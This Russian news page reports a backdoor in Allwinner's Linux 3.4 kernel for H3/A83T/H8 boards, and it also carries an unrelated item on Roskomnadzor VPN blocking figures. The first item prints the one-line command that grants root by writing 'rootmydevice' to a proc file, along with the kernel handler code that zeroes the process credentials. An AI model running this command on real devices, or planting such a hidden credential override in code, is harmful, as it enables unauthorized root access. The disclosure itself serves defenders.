Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Под блокировку Роскомнадзора попали уже 260 VPN

В настоящее время Роскомнадзор блокирует доступ к 258 сервисам VPN, не препятствующим доступу к запрещенному в стране контенту. В сравнении с прошлым годом черный список российского регулятора возрос почти на 31%.

В 2024 году под блок РКН попали 197 VPN. Новые цифры озвучил на проходящем в Сочи форуме Спектр-2025 Владислав Смирнов, возглавляющий исследования перспективных технологий в ГРЧЦ (Главный радиочастотный центр, работает под эгидой РКН).

Со слов спикера корреспондент ТАСС также пишет, что в 2025 году в рунете было заблокировано 252 анонимных имейл-сервиса (+20% в сравнении с 2024-м), 173 приложения (+28%), 410 источников вредоносных программ и 119 тыс. фишинговых сайтов (+441%).

По всей видимости, речь идет о ресурсах, уличенных в нарушении российского законодательства и попавших за это в реестр запрещенных Роскомнадзором.

Блокировка таких правонарушителей осуществляется с помощью технических средств противодействия угрозамТСПУ. Это оборудование устанавливается у интернет-провайдеров, но находится в ведении РКН.

Напомним, с марта прошлого года в России под блок могут попасть не только VPN-сервисы, игнорирующие требования регулятора рунета, но также ресурсы, рекламирующие VPN как средство обхода ограничений, введенных Роскомнадзором.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru